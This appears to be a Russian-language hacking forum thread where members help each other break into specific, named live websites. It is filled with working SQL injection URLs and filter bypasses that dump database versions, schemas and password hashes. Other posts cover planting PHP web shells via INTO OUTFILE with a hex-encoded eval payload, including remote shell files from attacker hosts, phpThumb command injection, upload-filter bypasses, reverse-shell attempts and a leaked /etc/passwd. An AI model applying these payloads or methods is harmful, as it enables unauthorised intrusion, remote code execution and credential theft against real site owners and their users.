Koren said:
такой вопрос: видел где то раскручивали скулю на asp?ID=15 поискав немного не нащёл
реально ведь вообще? можно пример привести + хотелось бы увидеть линк на статью по этой теме если есть
так же столкнулся ещё с такой проблемой...
http://www.tall.com/detail.php?itemid=7565&size=454/fuck
иньекция есть, 1 колонка вывод данныех недоступен(
посмотрите плыз
да и по первому вопросу оч нуждаюсь в ответе



1. причем тут яп сайта? будь это asp/php/jsp/cfm, все дело в базах, больше всего используются связки asp+MS_SQL или asp+MS_ACCESS

2. http://www.tall.com/detail.php?itemid=7565&size=454+and+1=@@version

http://www.tall.com/detail.php?itemid=7565&size=454+and+1=(select+top+1+table_name+from+infor mation_schema.tables)

Konqi просто помню одному человеку показал линк на иньекцию, сказав возможно это blind он сказал что на asp не раскрутить т. к там не всё так просто, вот и задал такой вопрос

Koren said:
Konqi просто помню одному человеку показал линк на иньекцию, сказав возможно это blind он сказал что на asp не раскрутить т. к там не всё так просто, вот и задал такой вопрос


а что, asp требует особых sql запросов?

пусть здесь выскажет свое мнение,мне тоже интересно

Какой может быть путь у сайта с @@version_compile_os= redhat-linux-gnu ?

-PRIVAT- said:
Какой может быть путь у сайта с @@version_compile_os= redhat-linux-gnu ?


дерева *NIX, больше никто ничего не может сказать

Нашёл в etc/passw следующие:


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0
perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74
rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
db:x:500:500::/home/db:/bin/bash
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
wburke:x:501:502::/home/wburke:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin

-PRIVAT-

для начала скажу что такого файла нету, а еще этот файл ниче не даст

-PRIVAT- said:
Какой может быть путь у сайта с @@version_compile_os= redhat-linux-gnu ?


если читалка работает то попробуй найти /etc/httpd/conf/httpd.conf

category.php?categoryID=55+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--+ указывает на фильтрацию, обхожу фильтр выдаёт цифры для вывода инфы но страница держится не больше 1 секунды, и перекидывает на главгую, возможно что то сделать?

впринцепи решение уже нашёл.. "остановив страницу"))

ну может есть ещё какой способ

т.к не всегда получается успеть нажать на stop

Используй спец софт, а не в браузере.

Koren said:
category.php?categoryID=55+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--+ указывает на фильтрацию, обхожу фильтр выдаёт цифры для вывода инфы но страница держится не больше 1 секунды, и перекидывает на главгую, возможно что то сделать?
впринцепи решение уже нашёл.. "остановив страницу"))
ну может есть ещё какой способ
т.к не всегда получается успеть нажать на stop



юзай более продвинутые бразуеры, такие как opera.

попугай от того что я перешёл на оперу ничего не изменилось(

IMMORTAL_S софт тот что у меня есть фильтр не обходит

Koren said:
category.php?categoryID=55+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--+ указывает на фильтрацию, обхожу фильтр выдаёт цифры для вывода инфы но страница держится не больше 1 секунды, и перекидывает на главгую, возможно что то сделать?
впринцепи решение уже нашёл.. "остановив страницу"))
ну может есть ещё какой способ
т.к не всегда получается успеть нажать на stop


Мдауж, отруби редирект + javascript в браузере.


Koren said:
о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1
недопустимые символы? или же?
как только не пробывал фильтровать
ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение


)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 --


Byrger said:
Вот ссылка, мне не жалко но если кто-то ковырнет раньше меня то поделитесь со всеми
http://www.flashloaded.com/cart/basket.php?action=Add&itemid=6587




http://www.flashloaded.com/cart/basket.php?action=Add&itemid=1+or+1+group+by+concat(version(),rand(0)|0) +having+min(0)+--+

Gorev said:
если читалка работает то попробуй найти /etc/httpd/conf/httpd.conf


У меня тоже есть сайтиги где можно через скулю залить шелл, но пути незнаю. Прочитал файл /etc/httpd/conf/httpd.conf , но путей не нашел. Или в конфиге апача не всегда путь найти можно? Кто подскажет?

ZARO said:
У меня тоже есть сайтиги где можно через скулю залить шелл, но пути незнаю. Прочитал файл
/etc/httpd/conf/httpd.conf
, но путей не нашел. Или в конфиге апача не всегда путь найти можно? Кто подскажет?


Покажи сайт в пм.

Charle не во всех случаях помогает отрубленая джаваскрипт

Научите плз крутить такие инъекции, когда order by показывает определенное кол-во полей, но union select говорит, что кол-во полей не совпадает.. в общем как бы двойная инъекция должна быть, а вот с синтаксисом у меня траблы...


Code:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264+union+select+1,2,3,4,5,6--&category_id=259

спасибо!

sqlinjector said:
Научите плз крутить такие инъекции, когда order by показывает определенное кол-во полей, но union select говорит, что кол-во полей не совпадает.. в общем как бы двойная инъекция должна быть, а вот с синтаксисом у меня траблы...

Code:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264+union+select+1,2,3,4,5,6--&category_id=259

спасибо!


И какое кол-во полей тебе показывает order by?

З.Ы.


Code:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264'and+mid(version(),1,1)='4&category_id=259



Code:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264'or+(select+count(*)from(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d((select+version()),1,64),floor(rand(0)*2)))='1&category_id=259

Вывод в ошибке - 4.1.22-log

Есть скуль, фильтрует select или union. Может кто помочь раскрутить ?


http://www.music-master.ru/?action=show_list&cat=11069%27+union+select+1/*

a1ertso said:
Есть скуль, фильтрует select или union. Может кто помочь раскрутить ?


http://www.music-master.ru/?action=show_list&cat=-11069+'+union+select+concat_ws(0x3a,version(),user (),database())+--+

ZARO, спасибо. А можете объяснить, почему вывод осуществляется только при соединении строк?

a1ertso said:
ZARO, спасибо. А можете объяснить, почему вывод осуществляется только при соединении строк?


Почему? Не обязательно соединять строки - http://www.music-master.ru/?action=show_list&cat=-11069+'+union+select+'vot%20vivod'+--+

Ты просто забыл отсечь вывод с первого запроса, достаточно было поставить минус перед cat=

ZARO, еще раз спасибо =)

И снова проблема


http://www.music-master.ru/?action=show_list&cat=-11069+%27+union+select+concat_ws%28table_name%20in formation_schema.tables%29+--+


Запрос небезопасен и был отвергнут.

Как это обойти?

a1ertso said:
ZARO, еще раз спасибо =)
И снова проблема
Запрос небезопасен и был отвергнут.
Как это обойти?



Можно так выводить :


Code:
http://www.music-master.ru/?action=show_list&cat=11069+'+and(select+1+from(select+count(*),conc at(concat_ws(0x3a,column_name),floor(rand(0)*2))x+ from+information_Schema.columns+group+by+x)a)+--+

Можно, конечно, и так, но обойти - это же гораздо интереснее

1) Методом научного тыка определяем, что блочится последовательность


Code:
...union...select...from...

2) Из блока последовательности следует, что все три слова должны находиться в одной строке)

3) Пытаемся сделать так, чтобы одна строка стала двумя, вводя энтер (%0A )


Code:
http://www.music-master.ru/?action=show_list&cat=-1'+union %0A select+table_name from information_schema.tables/*

И все работает ^_^

есть LFI

_http://www.alma-nah.com/soiskatelinew.php?a=[LFI]

нуллбайт не отсекает .html , есть ли альтернатива?

ПС

Подкиньте хорошей манны.

wkar said:
есть LFI
_http://www.alma-nah.com/soiskatelinew.php?a=[LFI]
нуллбайт не отсекает .html , есть ли альтернатива?
ПС
Подкиньте хорошей манны.


/thread98525.html

ругается на тип и фильтрует кавычки

http://ethnography.omskreg.ru/page.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10--+

Можно что-нибудь сделать в данном случае?

подскажите плз

InfectedM said:
ругается на тип и фильтрует кавычки
http://ethnography.omskreg.ru/page.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10--+
Можно что-нибудь сделать в данном случае?
подскажите плз


http://ethnography.omskreg.ru/page.php?id=-1+Union+select+version()::int,null,null,null,null, null,null,null,null,null--+

http://ethnography.omskreg.ru/page.php?id=-1+Union+select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+ from+pg_shadow--+

InfectedM said:
ругается на тип и фильтрует кавычки
http://ethnography.omskreg.ru/page.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10--+
Можно что-нибудь сделать в данном случае?
подскажите плз



http://ethnography.omskreg.ru//inc/db.inc

Заливаю шелл через sql и пишу +union+select+''+from+mysql.user+into+outfile+ту т путь

Фаил успешно заливается но при заходе на него пшет: Cannot execute a blank command in и путь

То есть при 232.php?cmd=phpinfo() просто выводиться пустая страница.

Что не так делаю?)

Gedj said:
Заливаю шелл через sql и пишу +union+select+''+from+mysql.user+into+outfile+ту т путь
Фаил успешно заливается но при заходе на него пшет: Cannot execute a blank command in и путь
То есть при 232.php?cmd=phpinfo() просто выводиться пустая страница.
Что не так делаю?)


бро, system() это системная обалочка, если хочешь исполнять php код, надо через eval

Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo() выводит Parse error: syntax error, unexpected $end in и и дальше путь

Gedj said:
Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo()
;
выводит Parse error: syntax error, unexpected $end in и и дальше путь


попробуй захексить код

union+select+0x3c3f706870206576616c28245f4745545b5 c27636d645c275d29203f3e+into+outfile

Сервер: Linux 2.6.26-2

При попытке бэк-конекта, командная строка просто висит пока не нажму отмена:

http://s50.radikal.ru/i129/1008/80/6d48cbee80bc.jpg


listening on [any] 31337 ...


У меня Win 2000

Может фаервол сервера блокирует? Пробовал порт 80, тоже самое. В чем может быть проблема и есть ли решение?

Gedj said:
Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo() выводит Parse error: syntax error, unexpected $end in и и дальше путь



Если ты можешь писать значит можешь и читать. сделай LOAD_FILE и посмотри что у тебя туда падает. Для начала попробуй ''

Сервак Windows NT при заливке шела через sql пишу

Дальше при cmd=dir выводит директории

Вопрос как залить шел в Winows NT через cmd?

http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version())--

почему вот тут кидает на главную, что можно сделать?

http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,SCHEMA_NAME)+from+in formation_schema.SCHEMATA+--+

Gedj said:
Сервак Windows NT при заливке шела через sql пишу
Дальше при cmd=dir выводит директории
Вопрос как залить шел в Winows NT через cmd?


мен ты мне другое говорил )) если eval то

cmd=copy($_GET,$_GET[d]);&s=http://твойсайт/shell.txt&d=/директория/shell.php;

потом локальный инклуд(если директория не видно из веб)

при allow_url_include=On

cmd=include("http://твойсайт/shell.txt");

Добавлю еще один способ.

Требования: allow_url_fopen = on

cmd=eval(file_get_contents('http://site.ru/shell.txt'));

Удалить php дескрипторы в начале и конце шелла.

Преимущества: не нужно знать папку на запись.

Недостатки: больше следит в логах

InfectedM said:
http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version())--
почему вот тут кидает на главную, что можно сделать?
http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,SCHEMA_NAME)+from+in formation_schema.SCHEMATA+--+



Короче это угар

Конечно, но благодаря ошибки и получасется вывод.

Вот так ты сможешь провдить инъекцию =)

http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version(),SCHEMA_NAM E)+from+information_schema.SCHEMATA+LIMIT+1,2+--+

http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=http://wwwwwwww/&ws=320&hs=240&f=png

code inj

обьясните в кратце как использовать

Lilo said:
http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=http://wwwwwwww/&ws=320&hs=240&f=png
code inj
обьясните в кратце как использовать


http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=/home/site.com/public_html/kartinka.jpg&fltr[]=blur|5%20-quality%2075%20-interlace%20line%20%22/home/site.com/public_html/kartinka.jpg%22%20jpeg:%22/home/site.com/public_html/kartinka.jpg%22%20;%20ls%20-la%20;&phpThumbDebug=9

это может быть уязвимо?

Microsoft OLE DB Provider for SQL Server error '80040e21'

Invalid character value for cast specification.

/view_lesson_plan.asp, line 21

если по этой ошибке трудно сказать оставлю линк

и ещё одна

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to int.

/scammer.asp, line 32

Koren said:
это может быть уязвимо?
Microsoft OLE DB Provider for SQL Server error '80040e21'
Invalid character value for cast specification.
/view_lesson_plan.asp, line 21
если по этой ошибке трудно сказать оставлю линк
и ещё одна
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to int.
/scammer.asp, line 32



А ошибка то просто валится или ты чё то в параметр пихаешь?

kfor said:
А ошибка то просто валится или ты чё то в параметр пихаешь?


в параметр asp?id=674 подставляем '

Koren said:
в параметр asp?id=674 подставляем '


Попробуй логическое выражение.. Ваапще наврено будет скуля но тока этовинда там другой синтаксис если что..

kfor said:
Попробуй логическое выражение.. Ваапще наврено будет скуля но тока этовинда
там другой синтаксис если что..


так в том то и дело что пробывал логическое)) ничего не меняется

а с виндой как быть?)

Koren said:
так в том то и дело что пробывал логическое)) ничего не меняется
а с виндой как быть?)


Ну всмысле там MS SQL. Где то была статья , даже мож и на ачате, про проведение инъекции. Ну гугл точно найдёт

http://clustercenter.org/login.php?return=/index/month/&category=1'

просто ошибка?

не крутится скуля такая?

пробывал у меня не вышло

Lilo

в выводе ошибки мускула есть пассивная xss


Code:
http://clustercenter.org/login.php?return=/index/month/&category=alert("xss")'

Lilo said:
http://clustercenter.org/login.php?return=/index/month/&category=1'
просто ошибка?
не крутится скуля такая?
пробывал у меня не вышло


_http://clustercenter.org/login.php?return=/index/month/&category=1'+or+(select+count(*)+from+(select+1+uni on+select+2+union+select+3)x+group+by+concat(versi on(),floor(rand(0)*2)))+--+

спасибо парни=) понял

плюсики кончились только=(

Ребята, подскажите чем зашифрованы пароли в базе данных mysql.user если они имеют такой вид:

root

*6E8611756F31DE90B29395C382E276861503CB8B

debian-sys-maint

*0B749C627EED121EBC71FBFEE656100950D0C2E4

это MySQL5

php_master said:
Ребята, подскажите чем зашифрованы пароли в базе данных mysql.user если они имеют такой вид:
root
*6E8611756F31DE90B29395C382E276861503CB8B
debian-sys-maint
*0B749C627EED121EBC71FBFEE656100950D0C2E4


root

*6E8611756F31DE90B29395C382E276861503CB8B

вот в этой теме расшифровка

расшифровка hash. Part3 (DES, MySQL, SHA-1)

каким скриптом\прогой лучше сдампить таблицу через sql-inj? записей около 500k

sipt и toolza на катят

:."]
.:[melkiy]:. said:
каким скриптом\прогой лучше сдампить таблицу через sql-inj? записей около 500k
sipt и toolza на катят


Какая база?

подскажите адрес phpmyadmin хостинга logol.ru. Буду очень благодарен. Или же расскажите как узнавать адреса phpmyadmin? может скрипт есть какой то?

Redwood said:
Какая база?


mysql 5.0.68-log

katrik said:
подскажите адрес phpmyadmin хостинга logol.ru. Буду очень благодарен. Или же расскажите как узнавать адреса phpmyadmin? может скрипт есть какой то?


Брутом...

-PRIVAT- said:
Брутом...


подскажите пожалуйста брут, а так ответ не понятен и не корректен...

:."]
.:[melkiy]:. said:
mysql 5.0.68-log


Попробуй чем нибудь из этого http://slil.ru/29579638

katrik said:
подскажите адрес phpmyadmin хостинга logol.ru. Буду очень благодарен. Или же расскажите как узнавать адреса phpmyadmin? может скрипт есть какой то?


Например вот этим http://slil.ru/29579647, выбери файл base_phpmyadmin.txt и скань.

неполучается обойти фильтр

id=165+/*!UnIoN+SeLeCt*/+1,group_cOnCaT(TabLe_naMe),3+information_schema.` tables`+WHERE+TabLE_sChEmA=

пробывал на остальные незафильтрованые команды(WHERE,TabLE_sChEmA) ставить /*.....*/ не помогает

Есть сплойт для повышения привилегий на linux 2.6.35 ? Гуглил, но ничего не нашел.

0_0 конечно нет, оно же вышло несколько недель назад

a1ertso said:
Есть сплойт для повышения привилегий на linux 2.6.35 ? Гуглил, но ничего не нашел.


_http://exploit.in/modules.php?name=news&file=view&news_id=3599 читаем и думаем как реализировать.

Какие есть методы заливки шелла, через форму загрузки изображения с проверкой расширения ?

legaljo said:
Какие есть методы заливки шелла, через форму загрузки изображения с проверкой расширения ?



Ты хоть уточни загружаешь то где. Самописный какой то скрипт или известный?

legaljo said:
Какие есть методы заливки шелла, через форму загрузки изображения с проверкой расширения ?


1) Пробовать расширения php3, php4, php5 и тд.

2) Вписать в любой файл (с расширением или без), который прошел проверку код и проинклудить.

3) Вставить код в метаданные файла и проинклудить.

3) Подменить в заголовках параметр Content-Type на нужный.

4) Пробовать обрезать расширение нулл байтом, file.php%00.gif

5) Обход кривых регулярок, file.php.dwqdq, file.php.gif,file.jpg.php,file.jpgdwq.php и тд и соответственно тоже проинклудить.

6) Попробовать пункт 1 в других регистрах.

legaljo, почитай https://rdot.org/forum/showpost.php?p=1142&postcount=7

Как я понял из статьи про sql inj то обнаружить ее можно тремя способами:

'

' --

и подставив цифры в id=

Почему тогда нету софта который бы чекал все эти возможные варианты?

iget said:
Как я понял из статьи про sql inj то обнаружить ее можно тремя способами:
'
' --
и подставив цифры в id=
Почему тогда нету софта который бы чекал все эти возможные варианты?


Нет, не только этими методами. Такого софта куча.

Redwood, а как еще? я видимо не совсем понял как их обнаруживать, ибо пытался эти три метода использовать на сайтах из темы sql inj, но я вот не понимаю, откуда вдруг берется запрос bla=-14141 почему именно так? как он нашел это? каковы еще методы есть? на что нужно обращать внимание в первую очередь? спасибо.

Логические выражения

Арифметические выражения

Передача неверных параметров скрипту через GET, POST, COOKIE

Передача не существующих параметров

Вариантов много, но судя по всему для тебя это пустой звук.

В случае, что ты указал идет отсечение вывода первого запроса и передача не существующего параметра базе.

Вообще, читай литературу, благо статей по sql инъекциям хватает, ну и не помешает немножко знать язык SQL.

На форуме есть отличная статья, советую ознакомиться.

/thread43966.html

iget, Часто бывает что выключен отчёт об ошибках. То есть даже если ты поставишь ' и т.п. ты не выбьешь ошибку.

SQL инъекции часто находят через Google. Как их искать смотри в самом Google.

Например имеется у тебя параметр ?id=2 поставь к примеру, так: ?id=2-1 -- . Если выйдет, тоже самое что и при ?id=1 , то тут 100% уязвимость.

Более подробно ты можешь почитать в статье SQL injection полный FAQ (https://antichat.live/threads/43966/)

Желаю тебе удачи, в этом нелегком деле!

дайте ссыль на заливку шелла через SQL запрос

Читай в статье Более подробно ты можешь почитать в статье SQL injection полный FAQ (https://antichat.live/threads/43966/)

нету прав на запись =(

bafoed, Довольно не часто эти права имеются. Так же нужно найти пути сайта если они есть.

Redwood, Бывают скули когда magic_quotes включен, а шелл залить реально !

bafoed said:
нету прав на запись =(


Для залития шелла через into outfile, тебе обязательно нужны привилегии File, magic_quotes = off (в некоторых случаях можно залиться и при magic_quotes = on), абсолютный путь до папки доступной на запись.

Как узнать включены ли magic_qoutes и allow_url_include еще было бы круто опен_бейсдир например узнавать? может есть тулза\скрипт, который выдавал бы эту нужную информацию?

iget , phpinfo() smotri..

/phpinfo

/phpinfo.php

/info.php

iget said:
Как узнать включены ли magic_qoutes и allow_url_include еще было бы круто опен_бейсдир например узнавать? может есть тулза\скрипт, который выдавал бы эту нужную информацию?


Обычно на сервере не хранят такую информацию (phpinfo()), например в файлах указанных нижу. Но если админ нуб, это реально. При открытии phpinfo() увидишь, то что тебе нужно. Magic_quotes включен/выключен можно узнать прямо в скуле. Достаточно узнать колонки любой таблицы, например "where+table_name='users'" и, если тебе вывелись колонки users, то magic_quotes выключен.

Здравствуйте!Я уже писал ранее:

Подскажите, пожалуйста!Cитуация:

Имеется инклудовый сайт, захожу на него шеллом так-

site.ru/index.php?page=http://myevilsite.narod.ru/shell.php

Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла.

Пробовал и r57shell 1.24 и другие, одинаково.

Может быть сможете что-нибудь посоветовать.

Windows NT VIA-008 5.2 build 3790

Microsoft-IIS/6.0

Сейчас обнаружил, что могу выполнять некоторые php сценарии, кроме создания и скачивания файлов. Подскажите, пожалуйста, возможно у кого-то есть, какие-либо идеи на сей счет. Заранее большое спасибо.

poprobuy asp shell

попробовал.к сожалению asp шеллы дают тот же результат, создание и скачивание файлов не удается выполнить((((

2against

Попробуй сделать так:

1) Ищешь на сайте папку, доступную для записи.

2) Пишешь в http://myevilsite.narod.ru/123.php такую прелесть:


Code:


3) site.ru/index.php?page=http://myevilsite.narod.ru/123.php

4) site.ru/папка/доступная/на/запись/321.php

Тут должен находиться полноценный шелл.

kamaz, Если не ошибаюсь narod.ru не поддерживает язык php.

-PRIVAT- said:
kamaz
, Если не ошибаюсь narod.ru не поддерживает язык php.


На народе ничего не будет выполняться.

RFI заключается в том, что удаленный скрипт выполняется на сервере.

Следовательно сервер, на котором находится сайт site.ru считает с народа файл 123.php и выполнит его, скопировав файл shell.php в папку, доступную для записи.

Вы не могли бы, пожалуйста, подсказать скрипт какой-нибудь на поиск директории без зепрета на запись на пхп.

я пробовал заходить через браузер папки, везде естественно -пермишн денайд!((

against said:
Вы не могли бы, пожалуйста, подсказать скрипт какой-нибудь на поиск директории без зепрета на запись на пхп.


так через шелл заинклюженный посмотри. Или мозгами пораскинь, где могут быть папки, доступные для записи: в /images/, /uploads/, /files/ и т.п. Если сайт с возможностью публикации контента, файлов и картинок, то пути в html-коде сайта глянуть можно. А почему у тебя не работает шелл приинклюденный (site.com/script.php?page=http://site2/shell.php). С99, да и wso нормально в таком режиме работают.

Попугай, затруднение в том, что сайт совсем статичный, в шелле не показывает не одной папки доступной на запись, все инклуды извне не получаются, как и скачивание, вероятно как-то режутся фаером. По-ходу на этом сайте ниче путного не прокатит, только если MySQL ковырять((((((

Всем большое спасибо за помощь, и советы)))

Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо

roddik said:
Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо



/etc/httpd/conf/httpd.conf

Посмотри так же тут: etc/passwd мб найдёшь что-нибудь...

roddik said:
Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо


odbc.ini ? mssql ?

k2b1~ said:
odbc.ini ? mssql ?


Ось Win64, C:/Windows/ODBC.INI такой:


Code:
[ODBC 32 bit Data Sources]
Forum=Microsoft Access-Treiber (*.mdb) (32 bit)
Antraege=Microsoft Access-Treiber (*.mdb) (32 bit)
joomla=MySQL ODBC 3.51 Driver (32 bit)
Internet=Microsoft Access-Treiber (*.mdb) (32 bit)
myWWW=MySQL ODBC 3.51 Driver (32 bit)
Werkstatt=MySQL ODBC 5.1 Driver (32 bit)
[Forum]
Driver32=C:\Windows\system32\odbcjt32.dll
[Antraege]
Driver32=C:\Windows\system32\odbcjt32.dll
[joomla]
Driver32=C:\Windows\SysWOW64\myodbc3.dll
[Internet]
Driver32=C:\Windows\system32\odbcjt32.dll
[myWWW]
Driver32=C:\Windows\SysWOW64\myodbc3.dll
[Werkstatt]
Driver32=C:\Program Files (x86)\MySQL\Connector ODBC 5.1\myodbc5.dll

Еще нашел php.ini, в котором прописан путь к еррор логу, но его открыть не удалось.

PS: догло я тупил, перед тем как тему на страницу дальше промотать))

В таблице phpmyadmin вывожу SELECT @ @basedir

И выходить ответ


@@basedir [BINARY - 1Байт]


Как вывести обычный текст...

есть ли здесь дыра? http://www.adagio-online.com/shop/product.php?id_product=16

сиптом крутит, но в ручную что то ничего

Koren said:
есть ли здесь дыра? http://www.adagio-online.com/shop/product.php?id_product=16
сиптом крутит, но в ручную что то ничего


нету здесь нечего

а вот у меня тоже вопрос вот например сайт

http://www.lomon.info/news/detail/?item_id=2'

открываю,а там у меня за место новости пусто.это дыра или с этим ничего не сделашь?

KNOT said:
а вот у меня тоже вопрос вот например сайт
http://www.lomon.info/news/detail/?item_id=2'
открываю,а там у меня за место новости пусто.это дыра или с этим ничего не сделашь?


не чего с эти не сделаешь

roddik said:
Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо


c:/windows/system32/inetsrv/Metabase.xml

попробуй


Gorev said:
/etc/httpd/conf/httpd.conf


в Винде?

Приветствую, нашел скулю(сплоит) на сайте (Joomla), сбрутил! хеш, а в админку попасть не могу, пишет 403 "Фиг Вам называется", как быть? Есть ли способы обойти этот запрет?

На некоторых сайтах с MySQL 4й версии названия таблиц и колонок приходится подбирать брутом с помощью программ. Если сайт американский (английский), либо если он в другой стране, но админы придерживаются стандартов, то проблем с перебором особо не возникает (user, users, admin, id, login, password и т.д.). В других случаях в списке может не оказаться нужного названия таблицы/колонки, как, например, сегодня было в случае с испанским сайтом (usuarios ("users" - по-испански)).

Так вот: есть ли где-нибудь списки таблиц и колонок на разных языках? Спасибо.

попугай said:
c:/windows/system32/inetsrv/Metabase.xml попробуй


Спасибо, вывело конфиг ииса, как я понял В том числе вот такое:


Code:



Location ="/" - это где? нету ли такого же конфига для вхостов?

Почитал немножко манов по ИИСу, в конфиге кастомный путь к логам, как я понял, в этой папке должна быть подпапка W3SVC? А в ней какой-то файл с текстом логов?

KNOT said:
а вот у меня тоже вопрос вот например сайт
http://www.lomon.info/news/detail/?item_id=2'
открываю,а там у меня за место новости пусто.это дыра или с этим ничего не сделашь?


Как бы сайт очень уязвим, я глянул одним глазком... тебя сайт интересует или именна эта уязвимость?

brutos said:
На некоторых сайтах с MySQL 4й версии названия таблиц и колонок приходится подбирать брутом с помощью программ. Если сайт американский (английский), либо если он в другой стране, но админы придерживаются стандартов, то проблем с перебором особо не возникает (user, users, admin, id, login, password и т.д.). В других случаях в списке может не оказаться нужного названия таблицы/колонки, как, например, сегодня было в случае с испанским сайтом (usuarios ("users" - по-испански)).
Так вот: есть ли где-нибудь списки таблиц и колонок на разных языках? Спасибо.


Вывод имён колонок (MySQL >= 4.1 колонки NOT NULL)

Jokester как-то писал на одном форуме:


Select
script.php?par=(1)and(SELECT * from xek.users)=(1)
==>
Operand should contain 4 column(s)
script.php?par=1 and (1,2,3,4) = (SELECT * from xek.users UNION SELECT 1%0,2,3,4 LIMIT 1)
==>
Column 'id' cannot be null

Вопросы по SQL-инъекции:

1) Нашел я инъекцию на одном шопе. Только ведет она себя странно. Если к параметру product_id=322 добавить символ ' то вылезет ошибка как обычно, но теперь это ошибка вообще не пропадет, пока не почистить систему CCleaner'ом, т.е даже оригинальный урл дает такую ошибку. И еще одна непонятка с этой инъекцией:

2) Узнал количество колонок с помощью ORDER+BY показало, что их 3 (ORDER+BY+4 выдает ошибку), но констркция UNION+SELECT+1,2,3-- выдает ошибку different number of columns

UPDATE: проблема номер 1 решилась отключением в браузере кукисов. Помогите решить вторую проблему

есть сайт с джумлой 1.0.15...и есть доступ супер админа...вопрос куда залить шелл?)

заливка шелла в Joomla (куча стособов) (https://antichat.live/threads/55205/)

установи модуль joomla explorer и сможешь файлы заливать

DavletAG said:
Вопросы по SQL-инъекции:
1) Нашел я инъекцию на одном шопе. Только ведет она себя странно. Если к параметру product_id=322 добавить символ ' то вылезет ошибка как обычно, но теперь это ошибка вообще не пропадет, пока не почистить систему CCleaner'ом, т.е даже оригинальный урл дает такую ошибку. И еще одна непонятка с этой инъекцией:
2) Узнал количество колонок с помощью ORDER+BY показало, что их 3 (ORDER+BY+4 выдает ошибку), но констркция UNION+SELECT+1,2,3-- выдает ошибку different number of columns
UPDATE: проблема номер 1 решилась отключением в браузере кукисов. Помогите решить вторую проблему


скорее всего блайнд иньекция, крути как блайнд


РедкийГад said:
есть сайт с джумлой 1.0.15...и есть доступ супер админа...вопрос куда залить шелл?)


а адрес гугла не знаем? google.ru -> заливка шелла в cms joomla

или юзаем поиск по форуму =\

Konqi said:
скорее всего блайнд иньекция, крути как блайнд
а адрес гугла не знаем? google.ru -> заливка шелла в cms joomla
или юзаем поиск по форуму =\


Спасибо! Прога Havij тоже определила как blind. Сейчас идет подбор имя базы и пользователя, вот только вместо символов там вопросики. Например имя базы: ??????????????????

В чем проблема?

daniel_1024 said:
заливка шелла в Joomla (куча стособов) (https://antichat.live/threads/55205/)
установи модуль joomla explorer и сможешь файлы заливать




- устанавливается как компонент
- внутри C99madShell
- доступен по адресу /components/com_articles/articles.php
